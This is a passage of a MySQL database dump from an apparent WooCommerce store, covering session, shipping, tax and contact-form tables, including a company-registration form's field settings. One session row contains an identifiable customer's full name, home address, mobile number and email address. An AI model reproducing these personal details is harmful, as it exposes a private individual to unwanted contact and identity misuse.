:13:\"shipping_city\";s:0:\"\";s:18:\"shipping_address_1\";s:0:\"\";s:16:\"shipping_address\";s:0:\"\";s:18:\"shipping_address_2\";s:0:\"\";s:14:\"shipping_state\";s:0:\"\";s:16:\"shipping_country\";s:2:\"ZA\";s:13:\"is_vat_exempt\";s:0:\"\";s:19:\"calculated_shipping\";s:1:\"1\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:7:\"company\";s:0:\"\";s:5:\"phone\";s:0:\"\";s:5:\"email\";s:0:\"\";s:19:\"shipping_first_name\";s:0:\"\";s:18:\"shipping_last_name\";s:0:\"\";s:16:\"shipping_company\";s:0:\"\";}\";s:21:\"chosen_payment_method\";s:7:\"payfast\";}',1566912964),(5137,'3','a:7:{s:4:\"cart\";s:6:\"a:0:{}\";s:11:\"cart_totals\";s:367:\"a:15:{s:8:\"subtotal\";i:0;s:12:\"subtotal_tax\";i:0;s:14:\"shipping_total\";i:0;s:12:\"shipping_tax\";i:0;s:14:\"shipping_taxes\";a:0:{}s:14:\"discount_total\";i:0;s:12:\"discount_tax\";i:0;s:19:\"cart_contents_total\";i:0;s:17:\"cart_contents_tax\";i:0;s:19:\"cart_contents_taxes\";a:0:{}s:9:\"fee_total\";i:0;s:7:\"fee_tax\";i:0;s:9:\"fee_taxes\";a:0:{}s:5:\"total\";i:0;s:9:\"total_tax\";i:0;}\";s:15:\"applied_coupons\";s:6:\"a:0:{}\";s:22:\"coupon_discount_totals\";s:6:\"a:0:{}\";s:26:\"coupon_discount_tax_totals\";s:6:\"a:0:{}\";s:21:\"removed_cart_contents\";s:6:\"a:0:{}\";s:8:\"customer\";s:820:\"a:26:{s:2:\"id\";s:1:\"3\";s:13:\"date_modified\";s:25:\"2019-08-05T09:58:17+00:00\";s:8:\"postcode\";s:4:\"1825\";s:4:\"city\";s:9:\"Ennerdale\";s:9:\"address_1\";s:12:\"9 jade close\";s:7:\"address\";s:12:\"9 jade close\";s:9:\"address_2\";s:6:\"Ext 11\";s:5:\"state\";s:2:\"GP\";s:7:\"country\";s:2:\"ZA\";s:17:\"shipping_postcode\";s:0:\"\";s:13:\"shipping_city\";s:0:\"\";s:18:\"shipping_address_1\";s:0:\"\";s:16:\"shipping_address\";s:0:\"\";s:18:\"shipping_address_2\";s:0:\"\";s:14:\"shipping_state\";s:2:\"GP\";s:16:\"shipping_country\";s:2:\"ZA\";s:13:\"is_vat_exempt\";s:0:\"\";s:19:\"calculated_shipping\";s:0:\"\";s:10:\"first_name\";s:6:\"Nazeer\";s:9:\"last_name\";s:8:\"Abrahams\";s:7:\"company\";s:11:\"Awesome-Inc\";s:5:\"phone\";s:10:\"0609834775\";s:5:\"email\";s:20:\"nazeer3791@gmail.com\";s:19:\"shipping_first_name\";s:0:\"\";s:18:\"shipping_last_name\";s:0:\"\";s:16:\"shipping_company\";s:0:\"\";}\";}',1566980398);
/*!40000 ALTER TABLE `wpxb_woocommerce_sessions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_woocommerce_shipping_zone_locations`
--

DROP TABLE IF EXISTS `wpxb_woocommerce_shipping_zone_locations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_woocommerce_shipping_zone_locations` (
  `location_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `zone_id` bigint(20) unsigned NOT NULL,
  `location_code` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `location_type` varchar(40) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`location_id`),
  KEY `location_id` (`location_id`),
  KEY `location_type` (`location_type`),
  KEY `location_type_code` (`location_type`,`location_code`(90))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_woocommerce_shipping_zone_locations`
--

LOCK TABLES `wpxb_woocommerce_shipping_zone_locations` WRITE;
/*!40000 ALTER TABLE `wpxb_woocommerce_shipping_zone_locations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_woocommerce_shipping_zone_locations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_woocommerce_shipping_zone_methods`
--

DROP TABLE IF EXISTS `wpxb_woocommerce_shipping_zone_methods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_woocommerce_shipping_zone_methods` (
  `zone_id` bigint(20) unsigned NOT NULL,
  `instance_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `method_id` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `method_order` bigint(20) unsigned NOT NULL,
  `is_enabled` tinyint(1) NOT NULL DEFAULT 1,
  PRIMARY KEY (`instance_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_woocommerce_shipping_zone_methods`
--

LOCK TABLES `wpxb_woocommerce_shipping_zone_methods` WRITE;
/*!40000 ALTER TABLE `wpxb_woocommerce_shipping_zone_methods` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_woocommerce_shipping_zone_methods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_woocommerce_shipping_zones`
--

DROP TABLE IF EXISTS `wpxb_woocommerce_shipping_zones`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_woocommerce_shipping_zones` (
  `zone_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `zone_name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `zone_order` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`zone_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_woocommerce_shipping_zones`
--

LOCK TABLES `wpxb_woocommerce_shipping_zones` WRITE;
/*!40000 ALTER TABLE `wpxb_woocommerce_shipping_zones` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_woocommerce_shipping_zones` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_woocommerce_tax_rate_locations`
--

DROP TABLE IF EXISTS `wpxb_woocommerce_tax_rate_locations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_woocommerce_tax_rate_locations` (
  `location_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `location_code` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `tax_rate_id` bigint(20) unsigned NOT NULL,
  `location_type` varchar(40) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`location_id`),
  KEY `tax_rate_id` (`tax_rate_id`),
  KEY `location_type` (`location_type`),
  KEY `location_type_code` (`location_type`,`location_code`(90))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_woocommerce_tax_rate_locations`
--

LOCK TABLES `wpxb_woocommerce_tax_rate_locations` WRITE;
/*!40000 ALTER TABLE `wpxb_woocommerce_tax_rate_locations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_woocommerce_tax_rate_locations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_woocommerce_tax_rates`
--

DROP TABLE IF EXISTS `wpxb_woocommerce_tax_rates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_woocommerce_tax_rates` (
  `tax_rate_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `tax_rate_country` varchar(2) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `tax_rate_state` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `tax_rate` varchar(8) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `tax_rate_name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `tax_rate_priority` bigint(20) unsigned NOT NULL,
  `tax_rate_compound` int(1) NOT NULL DEFAULT 0,
  `tax_rate_shipping` int(1) NOT NULL DEFAULT 1,
  `tax_rate_order` bigint(20) unsigned NOT NULL,
  `tax_rate_class` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`tax_rate_id`),
  KEY `tax_rate_country` (`tax_rate_country`),
  KEY `tax_rate_state` (`tax_rate_state`(191)),
  KEY `tax_rate_priority` (`tax_rate_priority`),
  KEY `tax_rate_class` (`tax_rate_class`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_woocommerce_tax_rates`
--

LOCK TABLES `wpxb_woocommerce_tax_rates` WRITE;
/*!40000 ALTER TABLE `wpxb_woocommerce_tax_rates` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_woocommerce_tax_rates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wr_contactform_fields`
--

DROP TABLE IF EXISTS `wpxb_wr_contactform_fields`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wr_contactform_fields` (
  `field_id` int(11) NOT NULL AUTO_INCREMENT,
  `form_id` int(11) NOT NULL,
  `field_type` varchar(45) COLLATE utf8mb4_unicode_ci NOT NULL,
  `field_identifier` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `field_title` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `field_instructions` text COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `field_position` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL,
  `field_ordering` int(10) unsigned NOT NULL DEFAULT 0,
  `field_settings` text COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`field_id`)
) ENGINE=MyISAM AUTO_INCREMENT=26 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wr_contactform_fields`
--

LOCK TABLES `wpxb_wr_contactform_fields` WRITE;
/*!40000 ALTER TABLE `wpxb_wr_contactform_fields` DISABLE KEYS */;
INSERT INTO `wpxb_wr_contactform_fields` VALUES (1,13,'choices','choices_67792955822_33_23','Number of directors','','left_2',0,'{\"id\":\"1\",\"identify\":\"choices_67792955822_33_23\",\"options\":{\"label\":\"Number of directors\",\"instruction\":\"\",\"required\":\"1\",\"randomize\":0,\"labelOthers\":\"Others\",\"layout\":\"jsn-columns-count-no\",\"items\":[{\"text\":\"1\",\"checked\":false},{\"text\":\"2\",\"checked\":false},{\"text\":\"3\",\"checked\":true},{\"text\":\"4\",\"checked\":false},{\"text\":\"more than 4\",\"checked\":false}],\"value\":\"\",\"customClass\":\"\",\"itemAction\":\"{\\\"1\\\":{},\\\"2\\\":{\\\"showField\\\":[\\\"name_30352531422_44_35\\\",\\\"physical_home_address_of_1st_director_67334520823_20_50\\\"]},\\\"3\\\":{\\\"showField\\\":[\\\"name_30352531422_44_35\\\",\\\"physical_home_address_of_1st_director_67334520823_20_50\\\",\\\"full_name_2nd_director_29773269723_18_53\\\",\\\"physical_home_address_of_1st_director_30978551523_15_21\\\"]},\\\"4\\\":{},\\\"more than 4\\\":{}}\",\"identify\":\"choices_67792955822_33_23\"},\"type\":\"choices\",\"position\":\"left_2\"}'),(2,13,'paragraph-text','paragraph_text_17959519822_36_46','Your Company Name','Provide at least 4 names each on a new line. Try different names rather than different variations of the same name.\r\nNote if the name is not available this may cause delays in the registration of the company; i.e. until a suitable name is found.','left_2',1,'{\"id\":\"2\",\"identify\":\"paragraph_text_17959519822_36_46\",\"options\":{\"label\":\"Your Company Name\",\"instruction\":\"Provide at least 4 names each on a new line. Try different names rather than different variations of the same name.\\r\\nNote if the name is not available this may cause delays in the registration of the company; i.e. until a suitable name is found.\",\"required\":\"1\",\"limitation\":0,\"limitMin\":0,\"limitMax\":0,\"rows\":\"3\",\"size\":\"jsn-input-xlarge-fluid\",\"limitType\":\"Words\",\"value\":\"\",\"customClass\":\"\",\"identify\":\"paragraph_text_17959519822_36_46\"},\"type\":\"paragraph-text\",\"position\":\"left_2\"}'),(3,13,'name','name_23574602122_30_20','1st Director/Incorporator\'s Full Name','This is generally one of the Directors','left_2',3,'{\"id\":\"3\",\"identify\":\"name_23574602122_30_20\",\"options\":{\"label\":\"1st Director\\/Incorporator\'s Full Name\",\"instruction\":\"This is generally one of the Directors\",\"required\":\"1\",\"size\":\"jsn-input-mini-fluid\",\"items\":[{\"text\":\"Mrs\",\"checked\":false},{\"text\":\"Mr\",\"checked\":true},{\"text\":\"Ms\",\"checked\":false},{\"text\":\"Baby\",\"checked\":false},{\"text\":\"Master\",\"checked\":false},{\"text\":\"Prof\",\"checked\":false},{\"text\":\"Dr\",\"checked\":false},{\"text\":\"Gen\",\"checked\":false},{\"text\":\"Rep\",\"checked\":false},{\"text\":\"Sen\",\"checked\":false},{\"text\":\"St\",\"checked\":false}],\"customClass\":\"\",\"vtitle\":\"1\",\"vfirst\":\"1\",\"vmiddle\":\"1\",\"vlast\":\"1\",\"sortableField\":\"[\\\"vtitle\\\", \\\"vfirst\\\", \\\"vmiddle\\\", \\\"vlast\\\"]\",\"identify\":\"name_23574602122_30_20\"},\"type\":\"name\",\"position\":\"left_2\"}'),(4,13,'address','address_65991126722_39_27','Physical Home Address of 1st Director','Please select country of citizenship if not South Africa','left_2',4,'{\"id\":\"4\",\"identify\":\"address_65991126722_39_27\",\"options\":{\"label\":\"Physical Home Address of 1st Director\",\"instruction\":\"Please select country of citizenship if not South Africa\",\"required\":\"1\",\"vstreetAddress\":\"1\",\"vcity\":\"1\",\"vstate\":\"1\",\"vcode\":\"1\",\"vcountry\":\"1\",\"country\":[{\"text\":\"Afghanistan\",\"checked\":false},{\"text\":\"Albania\",\"checked\":false},{\"text\":\"Algeria\",\"checked\":false},{\"text\":\"Andorra\",\"checked\":false},{\"text\":\"Angola\",\"checked\":false},{\"text\":\"Antigua and Barbuda\",\"checked\":false},{\"text\":\"Argentina\",\"checked\":false},{\"text\":\"Armenia\",\"checked\":false},{\"text\":\"Australia\",\"checked\":false},{\"text\":\"Austria\",\"checked\":false},{\"text\":\"Azerbaijan\",\"checked\":false},{\"text\":\"Bahamas\",\"checked\":false},{\"text\":\"Bahrain\",\"checked\":false},{\"text\":\"Bangladesh\",\"checked\":false},{\"text\":\"Barbados\",\"checked\":false},{\"text\":\"Belarus\",\"checked\":false},{\"text\":\"Belgium\",\"checked\":false},{\"text\":\"Belize\",\"checked\":false},{\"text\":\"Benin\",\"checked\":false},{\"text\":\"Bhutan\",\"checked\":false},{\"text\":\"Bolivia\",\"checked\":false},{\"text\":\"Bosnia and Herzegovina\",\"checked\":false},{\"text\":\"Botswana\",\"checked\":false},{\"text\":\"Brazil\",\"checked\":false},{\"text\":\"Brunei\",\"checked\":false},{\"text\":\"Bulgaria\",\"checked\":false},{\"text\":\"Burkina Faso\",\"checked\":false},{\"text\":\"Burundi\",\"checked\":false},{\"text\":\"Cambodia\",\"checked\":false},{\"text\":\"Cameroon\",\"checked\":false},{\"text\":\"Canada\",\"checked\":false},{\"text\":\"Cape Verde\",\"checked\":false},{\"text\":\"Central African Republic\",\"checked\":false},{\"text\":\"Chad\",\"checked\":false},{\"text\":\"Chile\",\"checked\":false},{\"text\":\"China\",\"checked\":false},{\"text\":\"Colombi\",\"checked\":false},{\"text\":\"Comoros\",\"checked\":false},{\"text\":\"Congo (Brazzaville)\",\"checked\":false},{\"text\":\"Congo\",\"checked\":false},{\"text\":\"Costa Rica\",\"checked\":false},{\"text\":\"Cote d\'Ivoire\",\"checked\":false},{\"text\":\"Croatia\",\"checked\":false},{\"text\":\"Cuba\",\"checked\":false},{\"text\":\"Cyprus\",\"checked\":false},{\"text\":\"Czech Republic\",\"checked\":false},{\"text\":\"Denmark\",\"checked\":false},{\"text\":\"Djibouti\",\"checked\":false},{\"text\":\"Dominica\",\"checked\":false},{\"text\":\"Dominican Republic\",\"checked\":false},{\"text\":\"East Timor (Timor Timur)\",\"checked\":false},{\"text\":\"Ecuador\",\"checked\":false},{\"text\":\"Egypt\",\"checked\":false},{\"text\":\"El Salvador\",\"checked\":false},{\"text\":\"Equatorial Guinea\",\"checked\":false},{\"text\":\"Eritrea\",\"checked\":false},{\"text\":\"Estonia\",\"checked\":false},{\"text\":\"Ethiopia\",\"checked\":false},{\"text\":\"Fiji\",\"checked\":false},{\"text\":\"Finland\",\"checked\":false},{\"text\":\"France\",\"checked\":false},{\"text\":\"Gabon\",\"checked\":false},{\"text\":\"Gambia,\",\"checked\":false},{\"text\":\"\\t\\t\\t The\",\"checked\":false},{\"text\":\"Georgia\",\"checked\":false},{\"text\":\"Germany\",\"checked\":false},{\"text\":\"Ghana\",\"checked\":false},{\"text\":\"Greece\",\"checked\":false},{\"text\":\"Grenada\",\"checked\":false},{\"text\":\"Guatemala\",\"checked\":false},{\"text\":\"Guinea\",\"checked\":false},{\"text\":\"Guinea-Bissau\",\"checked\":false},{\"text\":\"Guyana\",\"checked\":false},{\"text\":\"Haiti\",\"checked\":false},{\"text\":\"Honduras\",\"checked\":false},{\"text\":\"Hungary\",\"checked\":false},{\"text\":\"Iceland\",\"checked\":false},{\"text\":\"India\",\"checked\":false},{\"text\":\"Indonesia\",\"checked\":false},{\"text\":\"Iran\",\"checked\":false},{\"text\":\"Iraq\",\"checked\":false},{\"text\":\"Ireland\",\"checked\":false},{\"text\":\"Israel\",\"checked\":false},{\"text\":\"Italy\",\"checked\":false},{\"text\":\"Jamaica\",\"checked\":false},{\"text\":\"Japan\",\"checked\":false},{\"text\":\"Jordan\",\"checked\":false},{\"text\":\"Kazakhstan\",\"checked\":false},{\"text\":\"Kenya\",\"checked\":false},{\"text\":\"Kiribati\",\"checked\":false},{\"text\":\"Korea,\",\"checked\":false},{\"text\":\"\\t\\t\\t North\",\"checked\":false},{\"text\":\"\\t\\t\\t South\",\"checked\":false},{\"text\":\"Kuwait\",\"checked\":false},{\"text\":\"Kyrgyzstan\",\"checked\":false},{\"text\":\"Laos\",\"checked\":false},{\"text\":\"Latvia\",\"checked\":false},{\"text\":\"Lebanon\",\"checked\":false},{\"text\":\"Lesotho\",\"checked\":false},{\"text\":\"Liberia\",\"checked\":false},{\"text\":\"Libya\",\"checked\":false},{\"text\":\"Liechtenstein\",\"checked\":false},{\"text\":\"Lithuania\",\"checked\":false},{\"text\":\"Luxembourg\",\"checked\":false},{\"text\":\"Macedonia\",\"checked\":false},{\"text\":\"Madagascar\",\"checked\":false},{\"text\":\"Malawi\",\"checked\":false},{\"text\":\"Malaysia\",\"checked\":false},{\"text\":\"Maldives\",\"checked\":false},{\"text\":\"Mali\",\"checked\":false},{\"text\":\"Malta\",\"checked\":false},{\"text\":\"Marshall Islands\",\"checked\":false},{\"text\":\"Mauritania\",\"checked\":false},{\"text\":\"Mauritius\",\"checked\":false},{\"text\":\"Mexico\",\"checked\":false},{\"text\":\"Micronesia\",\"checked\":false},{\"text\":\"Moldova\",\"checked\":false},{\"text\":\"Monaco\",\"checked\":false},{\"text\":\"Mongolia\",\"checked\":false},{\"text\":\"Morocco\",\"checked\":false},{\"text\":\"Mozambique\",\"checked\":false},{\"text\":\"Myanmar\",\"checked\":false},{\"text\":\"Namibia\",\"checked\":false},{\"text\":\"Nauru\",\"checked\":false},{\"text\":\"Nepa\",\"checked\":false},{\"text\":\"Netherlands\",\"checked\":false},{\"text\":\"New Zealand\",\"checked\":false},{\"text\":\"Nicaragua\",\"checked\":false},{\"text\":\"Niger\",\"checked\":false},{\"text\":\"Nigeria\",\"checked\":false},{\"text\":\"Norway\",\"checked\":false},{\"text\":\"Oman\",\"checked\":false},{\"text\":\"Pakistan\",\"checked\":false},{\"text\":\"Palau\",\"checked\":false},{\"text\":\"Panama\",\"checked\":false},{\"text\":\"Papua New Guinea\",\"checked\":false},{\"text\":\"Paraguay\",\"checked\":false},{\"text\":\"Peru\",\"checked\":false},{\"text\":\"Philippines\",\"checked\":false},{\"text\":\"Poland\",\"checked\":false},{\"text\":\"Portugal\",\"checked\":false},{\"text\":\"Qatar\",\"checked\":false},{\"text\":\"Romania\",\"checked\":false},{\"text\":\"Russia\",\"checked\":false},{\"text\":\"Rwanda\",\"checked\":false},{\"text\":\"Saint Kitts and Nevis\",\"checked\":false},{\"text\":\"Saint Lucia\",\"checked\":false},{\"text\":\"Saint Vincent\",\"checked\":false},{\"text\":\"Samoa\",\"checked\":false},{\"text\":\"San Marino\",\"checked\":false},{\"text\":\"Sao Tome and Principe\",\"checked\":false},{\"text\":\"Saudi Arabia\",\"checked\":false},{\"text\":\"Senegal\",\"checked\":false},{\"text\":\"Serbia and Montenegro\",\"checked\":false},{\"text\":\"Seychelles\",\"checked\":false},{\"text\":\"Sierra Leone\",\"checked\":false},{\"text\":\"Singapore\",\"checked\":false},{\"text\":\"Slovakia\",\"checked\":false},{\"text\":\"Slovenia\",\"checked\":false},{\"text\":\"Solomon Islands\",\"checked\":false},{\"text\":\"Somalia\",\"checked\":false},{\"text\":\"South Africa\",\"checked\":true},{\"text\":\"Spain\",\"checked\":false},{\"text\":\"Sri Lanka\",\"checked\":false},{\"text\":\"Sudan\",\"checked\":false},{\"text\":\"Suriname\",\"checked\":false},{\"text\":\"Swaziland\",\"checked\":false},{\"text\":\"Sweden\",\"checked\":false},{\"text\":\"Switzerland\",\"checked\":false},{\"text\":\"Syria\",\"checked\":false},{\"text\":\"Taiwan\",\"checked\":false},{\"text\":\"Tajikistan\",\"checked\":false},{\"text\":\"Tanzania\",\"checked\":false},{\"text\":\"Thailand\",\"checked\":false},{\"text\":\"Togo\",\"checked\":false},{\"text\":\"Tonga\",\"checked\":false},{\"text\":\"Trinidad and Tobago\",\"checked\":false},{\"text\":\"Tunisia\",\"checked\":false},{\"text\":\"Turkey\",\"checked\":false},{\"text\":\"Turkmenistan\",\"checked\":false},{\"text\":\"Tuvalu\",\"checked\":false},{\"text\":\"Uganda\",\"checked\":false},{\"text\":\"Ukraine\",\"checked\":false},{\"text\":\"United Arab Emirates\",\"checked\":false},{\"text\":\"United Kingdom\",\"checked\":false},{\"text\":\"United States\",\"checked\":false},{\"text\":\"Uruguay\",\"checked\":false},{\"text\":\"Uzbekistan\",\"checked\":false},{\"text\":\"Vanuatu\",\"checked\":false},{\"text\":\"Vatican City\",\"checked\":false},{\"text\":\"Venezuela\",\"checked\":false},{\"text\":\"Vietnam\",\"checked\":false},{\"text\":\"Yemen\",\"checked\":false},{\"text\":\"Zambia\",\"checked\":false},{\"text\":\"Zimbabwe\",\"checked\":false}],\"customClass\":\"\",\"vstreetAddress2\":\"1\",\"sortableField\":\"[\\\"vstreetAddress\\\", \\\"vstreetAddress2\\\", \\\"vcity\\\", \\\"vstate\\\", \\\"vcode\\\", \\\"vcountry\\\"]\",\"identify\":\"address_65991126722_39_27\"},\"type\":\"address\",\"position\":\"left_2\"}'),(5,13,'phone','phone_29693815022_43_10','Cell Phone number of 1st Director','','left_2',5,'{\"id\":\"5\",\"identify\":\"phone_29693815022_43_10\",\"options\":{\"label\":\"Cell Phone number of 1st Director\",\"instruction\":\"\",\"required\":\"1\",\"format\":\"1-field\",\"value\":\"000 000 0000\",\"customClass\":\"\",\"oneField\":\"\",\"twoField\":\"\",\"threeField\":\"\",\"identify\":\"phone_29693815022_43_10\"},\"type\":\"phone\",\"position\":\"left_2\"}'),(6,13,'name','name_30352531422_44_35','Full Name 2nd Director','','left_1',6,'{\"id\":\"6\",\"identify\":\"name_30352531422_44_35\",\"options\":{\"label\":\"Full Name 2nd Director\",\"instruction\":\"\",\"required\":\"1\",\"size\":\"jsn-input-mini-fluid\",\"items\":[{\"text\":\"Mrs\",\"checked\":false},{\"text\":\"Mr\",\"checked\":true},{\"text\":\"Ms\",\"checked\":false},{\"text\":\"Baby\",\"checked\":false},{\"text\":\"Master\",\"checked\":false},{\"text\":\"Prof\",\"checked\":false},{\"text\":\"Dr\",\"checked\":false},{\"text\":\"Gen\",\"checked\":false},{\"text\":\"Rep\",\"checked\":false},{\"text\":\"Sen\",\"checked\":false},{\"text\":\"St\",\"checked\":false}],\"customClass\":\"\",\"hideField\":\"1\",\"vtitle\":\"1\",\"vfirst\":\"1\",\"vmiddle\":\"1\",\"vlast\":\"1\",\"sortableField\":\"[\\\"vtitle\\\", \\\"vfirst\\\", \\\"vmiddle\\\", \\\"vlast\\\"]\",\"identify\":\"name_30352531422_44_35\"},\"type\":\"name\",\"position\":\"left_1\"}'),(7,13,'address','physical_home_address_of_1st_director_67334520823_20_50','Physical Home Address of 2nd Director','Please select country of citizenship if not South Africa','left_1',7,'{\"id\":\"7\",\"identify\":\"physical_home_address_of_1st_director_67334520823_20_50\",\"options\":{\"label\":\"Physical Home Address of 2nd Director\",\"instruction\":\"Please select country of citizenship if not South Africa\",\"required\":\"1\",\"vstreetAddress\":\"1\",\"vcity\":\"1\",\"vstate\":\"1\",\"vcode\":\"1\",\"vcountry\":\"1\",\"country\":[{\"text\":\"Afghanistan\",\"checked\":false},{\"text\":\"Albania\",\"checked\":false},{\"text\":\"Algeria\",\"checked\":false},{\"text\":\"Andorra\",\"checked\":false},{\"text\":\"Angola\",\"checked\":false},{\"text\":\"Antigua and Barbuda\",\"checked\":false},{\"text\":\"Argentina\",\"checked\":false},{\"text\":\"Armenia\",\"checked\":false},{\"text\":\"Australia\",\"checked\":false},{\"text\":\"Austria\",\"checked\":false},{\"text\":\"Azerbaijan\",\"checked\":false},{\"text\":\"Bahamas\",\"checked\":false},{\"text\":\"Bahrain\",\"checked\":false},{\"text\":\"Bangladesh\",\"checked\":false},{\"text\":\"Barbados\",\"checked\":false},{\"text\":\"Belarus\",\"checked\":false},{\"text\":\"Belgium\",\"checked\":false},{\"text\":\"Belize\",\"checked\":false},{\"text\":\"Benin\",\"checked\":false},{\"text\":\"Bhutan\",\"checked\":false},{\"text\":\"Bolivia\",\"checked\":false},{\"text\":\"Bosnia and Herzegovina\",\"checked\":false},{\"text\":\"Botswana\",\"checked\":false},{\"text\":\"Brazil\",\"checked\":false},{\"text\":\"Brunei\",\"checked\":false},{\"text\":\"Bulgaria\",\"checked\":false},{\"text\":\"Burkina Faso\",\"checked\":false},{\"text\":\"Burundi\",\"checked\":false},{\"text\":\"Cambodia\",\"checked\":false},{\"text\":\"Cameroon\",\"checked\":false},{\"text\":\"Canada\",\"checked\":false},{\"text\":\"Cape Verde\",\"checked\":false},{\"text\":\"Central African Republic\",\"checked\":false},{\"text\":\"Chad\",\"checked\":false},{\"text\":\"Chile\",\"checked\":false},{\"text\":\"China\",\"checked\":false},{\"text\":\"Colombi\",\"checked\":false},{\"text\":\"Comoros\",\"checked\":false},{\"text\":\"Congo (Brazzaville)\",\"checked\":false},{\"text\":\"Congo\",\"checked\":false},{\"text\":\"Costa Rica\",\"checked\":false},{\"text\":\"Cote d\'Ivoire\",\"checked\":false},{\"text\":\"Croatia\",\"checked\":false},{\"text\":\"Cuba\",\"checked\":false},{\"text\":\"Cyprus\",\"checked\":false},{\"text\":\"Czech Republic\",\"checked\":false},{\"text\":\"Denmark\",\"checked\":false},{\"text\":\"Djibouti\",\"checked\":false},{\"text\":\"Dominica\",\"checked\":false},{\"text\":\"Dominican Republic\",\"checked\":false},{\"text\":\"East Timor (Timor Timur)\",\"checked\":false},{\"text\":\"Ecuador\",\"checked\":false},{\"text\":\"Egypt\",\"checked\":false},{\"text\":\"El Salvador\",\"checked\":false},{\"text\":\"Equatorial Guinea\",\"checked\":false},{\"text\":\"Eritrea\",\"checked\":false},{\"text\":\"Estonia\",\"checked\":false},{\"text\":\"Ethiopia\",\"checked\":false},{\"text\":\"Fiji\",\"checked\":false},{\"text\":\"Finland\",\"checked\":false},{\"text\":\"France\",\"checked\":false},{\"text\":\"Gabon\",\"checked\":false},{\"text\":\"Gambia,\",\"checked\":false},{\"text\":\"\\t\\t\\t The\",\"checked\":false},{\"text\":\"Georgia\",\"checked\":false},{\"text\":\"Germany\",\"checked\":false},{\"text\":\"Ghana\",\"checked\":false},{\"text\":\"Greece\",\"checked\":false},{\"text\":\"Grenada\",\"checked\":false},{\"text\":\"Guatemala\",\"checked\":false},{\"text\":\"Guinea\",\"checked\":false},{\"text\":\"Guinea-Bissau\",\"checked\":false},{\"text\":\"Guyana\",\"checked\":false},{\"text\":\"Haiti\",\"checked\":false},{\"text\":\"Honduras\",\"checked\":false},{\"text\":\"Hungary\",\"checked\":false},{\"text\":\"Iceland\",\"checked\":false},{\"text\":\"India\",\"checked\":false},{\"text\":\"Indonesia\",\"checked\":false},{\"text\":\"Iran\",\"checked\":false},{\"text\":\"Iraq\",\"checked\":false},{\"text\":\"Ireland\",\"checked\":false},{\"text\":\"Israel\",\"checked\":false},{\"text\":\"Italy\",\"checked\":false},{\"text\":\"Jamaica\",\"checked\":false},{\"text\":\"Japan\",\"checked\":false},{\"text\":\"Jordan\",\"checked\":false},{\"text\":\"Kazakhstan\",\"checked\":false},{\"text\":\"Kenya\",\"checked\":false},{\"text\":\"Kiribati\",\"checked\":false},{\"text\":\"Korea,\",\